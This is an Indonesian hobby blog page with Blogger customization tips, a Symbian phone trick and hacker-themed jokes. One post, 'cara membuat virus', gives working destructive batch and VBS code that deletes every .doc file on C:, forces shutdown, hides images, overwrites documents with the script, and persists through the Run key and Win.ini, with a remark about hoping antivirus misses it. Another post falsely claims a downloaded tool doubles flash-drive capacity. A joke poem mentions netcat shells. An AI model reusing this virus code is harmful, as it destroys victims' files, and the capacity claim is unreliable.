13. Dalam beberapa kasus, ada kemungkinan pesan yang anda terima tidak mencantumkan nomor pengirim namun menggantinya dengan tulisan misalnya BIBLE dan sebagainya. Ketahui apakah setiap kali anda mendapat SMS tersebut, pulsa anda terpotong dalam nominal tertentu. Teknologi ini dinamakan Sender ID masking . Jika ini yang terjadi, maka anda akan kecewa ketika meminta bantuan ke customer service operator. Laporkan kejadian ini ke BRTI dan operator karena untuk mendapatkan data siapa pengirimnya memerlukan investigasi lebih lanjut dan pelanggaran ini masuk dalam kategori serius. Teknologi ini sebenarnya sering dimanfaatkan oleh untuk promosi melalui SMS. Biasanya CP yang membayar Bulk SMS dan mengirimkannya ke nomor-nomor pelanggan yang dimiliki CP tersebut. Meskipun Bulk SMS ini tidak mengurangi nilai pulsa anda, namun dapat dikategorikan dalam spam, dan jika anda merasa dirugikan anda dapat melaporkannya pula ke operator atau ke BRTI.

»»  READMORE...

cara merubah favicon di blog

cara mengganti favicon blogger itu gak susah , Bagi kalian yang masih bingung apa sih Favicon itu? Favicon (favourite icon) adalah icon kecil yang berada di samping alamat blog atau website kita. Apabila kita membuat blog di Blogger.com , maka favicon yang berada di samping alamat URL anda adalah berupa favicon blogger.


dan cara menggantinya sebagai berikut
siapkan gambar yang mw di jadiin iconnya lalu upload di photobucket , untuk menjadikan gambar menjadi icon silahkan
klik disini


lalu masuk ke blogger dengan id kamu
masuk ke rancangan
edit html

cari kode ini bisa gunakan ctrl+f

<b:skin><![CDATA[/*



lalu copas code berikut tepat diatas code tadi


</script>
<link href='taruh linkkk gambar di sini' rel='icon' type='image/gif'/>
<b:skin><![CDATA[/*


selesaiii
haapy bloggingg

»»  READMORE...

cara menaikkan kapasitas flaskdisk kita

buat pengunjung blog aku yang tersayang haha bagi yang punya flashdisk, micro SD, MMC atau apalah, memori eksternal HP yang ukurannya cuma 1 Gb, ini ada cara untuk memperbesar kapasitasnya menjadi 2 Gb. Nah loh, jadi 2 kalinya kan, lumayan daripada beli yang 2 Gb lebih mahal.



Gini caranya :


- Colokkan flashdisk (micro SD, MMC, mini SD, de el el) ke komputer, trus format menjadi FAT, ingat, FAT bukan FAT32
- Download dulu aplikasinya di sini http://tiny.cc/up_1Gb_By_DemiPanglolipop , trus jalankan aplikasinya
- Pilih lokasi flashdisk tadi, pilih manual atau bisa juga refresh
- Setelah dipilih, klik FIX
- Klik OK, OK, OK
- Nanti akan muncul pesan untuk mencopot flashdisk dan colokkin lagi, lakukan
- Sekarang liat kapasitas flashdisk kalian lewat properties

JRENGGGGGGGGG!!!!!!!!!! Gimana hasilnya???


»»  READMORE...

mengganti icon kursor di blogger

cara mengganti cursor diblog
yah sekarang saya akan memberikan sedikit tips
bagi yang mau memperindah blognya
dengan kursor yang berbentuk muka kita atau apa saja lah hahy
ini tidak gampang juga tidak lah semudah yang kita pikirkan
dari pada susah* banyak basa basi lagi langsung aja


berikut langkah-langkahnya
pertama login dengan id kmu di blogger.com
kedua rancangan
masuk ke edit laman
add gadget
pilih html java script
kosongkan judul
lalu copas kekotak kedua
script di bawah ini

<style type="text/css">body {cursor:url("taru alamatgambar kalian di sini "),default}</style>


alamt gambarnya bisa kalian taruh di photobucket dLL

tapi usahakan yang udah jadi icon yah

kalau mau web yang menyediakan jasa mengubah gambar menjadi icon klik disini

demikian tolong komenttt yahh


haappyy bloggingg


»»  READMORE...

lagu hackerr

lagu kuburan versi hacker

;;
;;
;;
;;;
;;;;
;;;;;


[*]

LUPA! lupa lupa lupa, lupa lagi syntaxnya

LUPA! lupa lupa lupa, lupa lagi syntaxnya

INGAT! ingat ingat ingat, cuma ingat Algonya

INGAT! aku ingat ingat, cuma ingat Algonya


[**]

C: \registry, \Services, ke blok,

ke C: lagi, \registry, C panel, ke blok,

ke C: lagi, \registry, C panel, ke blok,

ke C: lagi,


Back to[*] [**]


C: sialan, keDeepfreeze, ke D:,

ke C: lagi, sialan, keDeepFreeze, mampus,

ke C: lagi, \registry, C panel, ke blok,

ke C: lagi, \services, kill AV, ke blok,

ke C: lagi, \registry, Kill AV, ke blok,

SYNTAX ERROR!!


»»  READMORE...

cara membuat virus

dasar* membuat virus

Gak pakek basa-basi dach.......
Cekidot.....^_^

1.Delete Registry : REG DELETE ALAMAT /v VALUE NAME /f
Keterangan :
- REG DELETE = Menghapus registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
::::
:::
::
:

- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
Contoh : REG DELETE HKEY\Software\Microsoft\Windows\Policies\Explorer /v NoFind
Fungsi = Menghapus Value NoFind Di Alamat Registry HKEY\Software\Microsoft\Windows\Policies\Explorer

2.ADD Registry : REG ADD ALAMAT /v VALUE NAME /t TYPE /s SEPARATOR /d DATA /f
Keteranagn :
- REG ADD = Menambah registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /t TYPE = Type data Ex: REG_DWORD, REG_SZ
- /d DATA = Isi Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt

3.PROMPT : PROMPT Text
Keterangan:
PROMPT = Perintah untuk merubah text PROMPT
Text = Text yang ingn kita munculkan di PROMPT
Text dapat menggunakan karakter spesial yang daftarnya berikut ini!!
$A = Karakter & $N = Drive kita menginstal windows
$B = Karakter | $P = Default
$C = Karakter ( $Q = Karakter =
$D = Karakter Tanggal Sekarang $S = Karakter Spasi
$E = Karakter Escape Kode $T = Karakter Jam Sekarang
$F = Karakter ) $V = Karakter No Versi Windows
$G = Karakter > (lebih besar dari) $_ = Karakter Garis Bawah
$H = Karakter No Text $$ = Karakter Dollar
$L = Karakter < (lebih kecil dari) $+ = Karakter Aritmatik

4.Replace : Replace [Drive\Path\NamaFile] [Drive\Path] /A /P /R /S /W /U
Keterangan:
Replace = Pindahkan
- [Drive\Path\NamaFile] = Spesifik sumber file
- [Drive\Path\] = Folder Tujuan
- A = Pindahkan File ke Folder Tujuan (No Update)
- P = Membuat Prompt MengKonfirmasi Kita Sebelum Memindahkan
- R = Pindahkan hanya File Attribut Read Only
- S = Pindahkan File Ke Semua Sub Direktori Folder Tujuan
- W = Tunggu kita memasukan disk/flashdisk sebelum memindahkan
- U = Pindahkan dan Update jika nama file sudah ada
- Jika menggunakan parameter /A tidak boleh menggunakan /S /U begitu juga sebaliknya.

5.Attrib : Attrib +R -R +A -A +H -H +S -S ADRESS /S /D
Keterangan:
Attrib = Rubah Attribut File/Folder
- (-) = Untuk Menghapus Attribut
- (+) = Untuk Menambah Attribut
- (A) = Attribut Archieve
- (R) = Attribut Read Only
- (H) = Attribut Hidden
- (S) = Attribut Super_Hidden/System
- /S = Proses terhadap file yang sama di folder dan subfolder
- /D = Proses folder Sebagai Sumber
- Adress = Alamat File Misal: C:\Lucky\Ganteng

6.Del : Del /P /F /S /Q /Attribut /Adress
Keterangan:
- Del = Hapus File / Folder
- /P = Membuat Prompt MengKonfirmasi Kita Sebelum Menghapus
- /F = Hapus Hanya Read Only File
- /S = Hapus File Yang Sama Di Semua Sub Direktory
- /Q = Hapus Dengan Cepat
- /Attribut = Pilih Attribut File Yang Ingin Di Hapus (Tidak Ada Berarti Semua File) tanda (-) berarti yang tidak di hapus- - Adress = Alamat File Misal: C:\Lucky\Ganteng

7.Rename : Rename/Ren [Drive\Path\NamaFile] NewFileName
Keterangan:
- Rename = Rubah Nama File
- [Drive\Path\NamaFile] = Alamat Drive dan Nama File
- NewFileName = Nama File Baru

8.Type : Type [Drive\Path\NamaFile]
Keterangan:
- Type = Membuka Semua File Text (*.txt, *.doc, *.xls, *.ini, *.vbs, *.js, dll)
- [Drive\Path\NamaFile] = Lokasi File

9.Start : Start ADDRESS_FILE
- Start = Untuk menjalankan File
- ADDRESS_FILE = Alamat file di special folder seperti windows dan system32
- Ex: Start Regedit maka akan menjalankan Registry Editor.
sekarang kita akan membahas file *.bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kode berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih “All File” dalam kolom “Save As Type” lalu jalankan!! setelah itu apa yang terjadi?? yah tanggal berubah jadi juli-7-2007.

oke lanjut ke file *.bat kita tidak mungkin membuat banyak file *.bat karena selain akan cepat terdeteksi, kita juga akan semakin rumit merubahregistry!! namun jangan kuatir karena file *.bat bisa menjalankan perintah DOS/COMMAND_PROMPT secara langsung.
berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C:\*.doc ‘—– hapus semua file berextensi doc di drive c
Shutdown -s -f -t 30 -c “Selamat Tidur” ‘—– -s = shutdown computer, -f = tutup semua aplikasi tanpa peringatan, -t = setting waktu(dalam detik) -c = menampilkan pesan “Selamat Tidur” (Bebas kita ubah)
attrib +s +h C:\*.jpg /s /d ‘—– beri attribut hidden dan system semua file jpg
for /R c:\ %%r in (*.cob *.doc) do copy %0 “%%r” ‘—– Copy isi file *.bat ke semua file *.cob dan *.doc di C
for /R c:\ %%r in (*.cob *.doc) do ren “%%r” *.bat ‘—– Rename semua file *.cob dan *.doc jadi *.bat sehingga isi file jd virus kita :D haha..haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling cocok!! mungkin menghapus, shutdown dalam 30 detik, menyembunyikan atau merubah isinya jadi file *.bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kode berikut ini:
Set bath = fso.CreateObject(towind & “\sialan.bat”)
bath.writeline “del C:\*.doc”
bath.writeline “Shutdown -s -f -t 30″
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do copy %0 %%r”
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do ren %%r *.bat”
bath.close
‘bonus
wsh.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\”SysError”, “towind & “\sialan.bat”, “REG_SZ”
Maka ketika windows diaktifkan semua file doc akan menjadi *.bat dengan isi kode penghancur kita :D bisa diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kode tersebut akan di blok karena jelas-jelas untuk merusak!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali :D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita bisa membuat file lain seperti *.html atau *.ini!! jika kita punya banyak duplikat virus kita bisa membuat file *.ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah file ini diwindows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile(”C:\WINDOWS\Win.ini”)
BuatIni.writeline “[WINDOWS]”
BuatIni.writeline “run = C:\Ju_Pe.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.writeline “load = C:\Persik.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah dirubah.
Dari pembahasan kita maka kita bisa simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda bisa melihat dan membunuh semua virus dan membenarkanregistry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda bisa menggunakan tool pengganti TaskManager yang biasanya akan di blok.
2.Hapus semua duplikat virus!! anda bisa gunakan antivirus update terbaru dan jika diblok virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe
3.Buka registry dan periksa dengan teliti semua subkey run otomatis biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa file win.ini!! jika dirubah anda minta dari komputer teman anda :D dan jika ada petunjuk letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!
Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika bisa yang mempunyai fitur heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
“HKCU(atau HKLM)\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer”, buat DWORD value baru dengan nama NoDriveTypeAutorun dan isi dengan nilai 255. atau melalui start—Run—ketik GPEDIT.msc—User Configuration—Administratif Templates—–System—–Cari Turn Off AutoPlay—–klik 2x dan rubah jadi Enabled!!
5.Jangan Pakai OS Windows, pake linux cos VMaker Indonesia cuma bisa bikin untuk windows...

sumber the hacking

»»  READMORE...

iseng


Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymous proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system, ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku? Apa aku harus pasang backdoor “Remote Connect-Back Shell” jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.





Seandainya hatimu adalah sebuah system, saat semua request-ku diterima aku akan nongkrong terus di bugtrack untuk mengetahui bug terbarumu maka aku akan patch n patch terus, aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada malicious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system, jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau diping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, …?

Tapi sayang hatimu bukanlah sebuah system, kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!

Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang menghanyutkan. Ga ada anti virus yang dapat menangkalnya selain …

kamu.




Balasannya:

Maaf, aku tak pernah menggunakan port default. Dan aku selalu menggunakan protocol2 yang secure. Sehingga tak kan pernah kau mendapatkan plain text saat kau mencoba melakukan sniffing terhadapku dan C:\nc -l -o -v -e yang kau berikan hanya kuanggap sebagai spam semata.

Meskipun kau menggunakan anonymous proxy, kan terus ku trace, hingga ku temukan IP asli mu sebagai seorang pecundang yang tak bisa di andalkan.

Maaf, bug-bug vulnerabilitasku yang kau temukan hanyalah sebuah honeypot untuk menjebak pecundang sepertimu.

Antivirus ku telah mendetect dan me-remove mu sebagai sebuah trojan yang mengancam meskipun kau berhasil memasang backdoor php shell di hatiku tapi maaf,.. server tomcat ku hanya support jsp.
Freespace yang ada hanya tinggal sebuah drive swap yang sangat penting artinya bagiku, dan takkan kuijinkan siapapun menempatinya.

Meskipun kau berhasil menambatkan Netcat sebagai “Remote Connect-Back Shell”, percuma,.. proxy bokap ku takkan pernah mengijinkanku terkoneksi dg orang lain.

Maaf, untuk saat ini kau hanya akan menerima “Request timed out” dariku. Karena hatiku sedang “Sorry, server maintenance”.

Tak perlu kau menjaga ku, karna bokapku telah menjodohkanku dengan seorang PNS (bukan Pegawai Negeri Sipil tapi Professional Network Security)

Maaf, untuk saat ini “Destination unreachable”.
Untukmu tak prnah ada kata “You dont have permission to access it”.
Suatu saat kau akan menerima “Reply from me” dengan TTL=never. Tapi hanya sebatas sahabat, jangan mengharap respon lebih dariku. Karena adminku bisa-bisa curigation dan memblok akses dengan alasan klasik RUU APP.

Kau benar, aku bukanlah sebuah system, dan aku bukanlah bidadarimu.

»»  READMORE...

Jumat, Juni 11, 2010

cara membuat read more atau baca selengkapnya di blogger

Yah haRI NI saya bakal memberikan tips membuat read more atau baca selangkapnya pada blogspot/blogger
Ini request dari temen saya....
Read more ini kegunaannya untuk mempersingkat postingan agar tak memenuhi beranda atau home blog kita karena jika penuh loading blog kita akan sangat lambat. aTau lola
Yah dari pada banyak cincong langsung ajja dah


Langkah pertama masuk di sini
login dengan id kamu.
Klik Setting_klik Formatting_Pada layar paling bawah, ada text area kosong disamping tulisan Post Template, isi tesxt area kosong tersebut dengan kode di bawah ini :

<div class="fullpost">


</div>

Klik tombol yang bertuliskan Save Settings

Pemasangan kode ini di maksudkan agar pada saat posting artikel, kode tersebut langsung muncul tanpa harus menuliskan terlebih dahulu, jadi membantu kita agar tidak harus selalu mengingat kode tersebut.
Langkah selanjutnya yaitu menambahkan kode pada template, silahkan ikuti langkah berikut :
� Klik menu Dasboard
� Klik menu Layout
� Klik menu Edit HTML
� Klik tulisan Download Full Template
� Silahkan save dulu template tersebut, ini di maksudkan untuk mengurangi resiko apabila terjadi kesalahan ketika melakukan editting pada template, kita masih punya back up data untuk mengembalikannya seperti semula
� Beri tanda centang pada kotak di samping tulisan Expand Widget Template, sekali lagi jangan lupa beri tanda centang dulu yah, sebab kalau tidak, nanti akan tidak sesuai dengan langkah selanjutnya
� Tunggu beberapa saat ketika proses sedang berlangsung
� Silahkan Sobat cari kode berikut pada kode template milik sobat :

<div class='post-body'>

� Copy kode HTML di bawah ini kemudian paste di bawah kode tadi


<b:if cond='data:blog.pageType == "item"'>

<style>.fullpost{display:inline;}</style>

<p><data:post.body/></p>

<b:else/>

<style>.fullpost{display:none;}</style>



� Kemudian lihat kebagian bawah sehingga terlihat kode berikut ini :


<p><data:post.body/></p>

� Copy kode HTML di bawah ini kemudian paste di bawah kode tadi

<a expr:href='data:post.url'>Read More......</a>

</b:if>

� klik tombol bertuliskan Save Template
� Selesai.



Cara Posting Artikel
� Klik menu Posting
� Klik menu Edit HTML, maka secara otomatis tampak kode yang telah kita setting tadi, yakni :


<div class="fullpost">


</div>


� Tulisankan artikel yang ingin tampak pada beranda blog sebelum kode :

<div class="fullpost">

� Tulis keseluruhan sisa artikel sesudah kode di atas tadi dan sebelum kode :

</div>

� Klik tombol bertuliskan PUBLISH POST
� Klik tulisan Open New Window untuk melihat hasil dari postingan kita, kemudian lihat apakah hasilnya sukses atau tidak. Jika tidak, mungkin ada bagian yang terlewatkan. Coba lihat kembali langkah diatas
� Selamat mencoba !

HappY bloggingg

»»  READMORE...

Jumat, Juni 04, 2010

cara membuat text berjalan (marquee) berisi link

sekarang saya akan mengajarkan cara membuat marquee yang berisi link link, kegunaan dari marquee ini qta bisa menghemat tempat saat memasukkan linklink blog kawan kita (tukeran link)
heheh udah mengertikahhh anda kalo belum ngerti silahkan koment euy ^^



sebenarnya tidak sussah hanya kita tak mau berusahha hahaha soknya saya ni ckckckckc
berikut contoh marquenya




blog Qidiiess


blog laphandhe ^^


google dot com





seperti contoh di atas itulah marqueenya kalau mau silahkan kita mulai membuatnya ^^

login blogger
tata letak
elemen laman
tambah gadget
html/java script
paste code di bawah ini

<marquee onmouseover="this.stop()" onmouseout="this.start()" scrollamount="2" direction="up" width="100%" height="100" align="center">

<a href="http://laphandhe.blogspot.com" target="new">blog laphandhe ^^ </a><br/>

<a href="http://www.google.com" target="new">google dot com </a><br/>

</marquee>




kalau mau tambah lagi link nya tinggal tambah

<a href="linknya" target="new">blog tulisan judul </a><br/>



happyy blogginggg
»»  READMORE...

Rabu, Juni 02, 2010

cara membuat kinerja handphone symbian kita menjadi lebih baik

cara membuat kinerja hp symbian kita menjadi high kualitas
tak sesusah yang ada di pikiran anda
ikuti tutorial berikut ini



1 - Ganti pengaturan tanggal di Hp mu jd :
- Bulan 05
- Tanggal 01
- Tahun 2005

2 - Buka Kalender & buatlah Agenda baru seperti berikut :
- Topic / Subject: Speed
- Due date : tgl 04, bln 08, thn 2005
- Priority: High

Langkah ke-2
- Topic / Subject : Quokie
- Due date: (sama seperti sebelumnya) (/04/08/2005)
- Priority: low

3 - Confirm, Buka ke-2 Agenda td & tampilkan
kemudian tekan option & mark all ke dua agenda td (very importan)

4 -Tutup kalender td & kembalikan pengaturan asal tanggal sebenarnya ,,, that is all.


Test Working on E71,N73,N82,E65,N95,N81,5800xm

semoga berhasil membuat hp symbian sobat menjadi lebih baik kinerjanya
Ps : TIDAK SEMUA HP BISA SUPPORT,TAPI APA SALAHNYA DICOBA

sumber :: the hacking
»»  READMORE...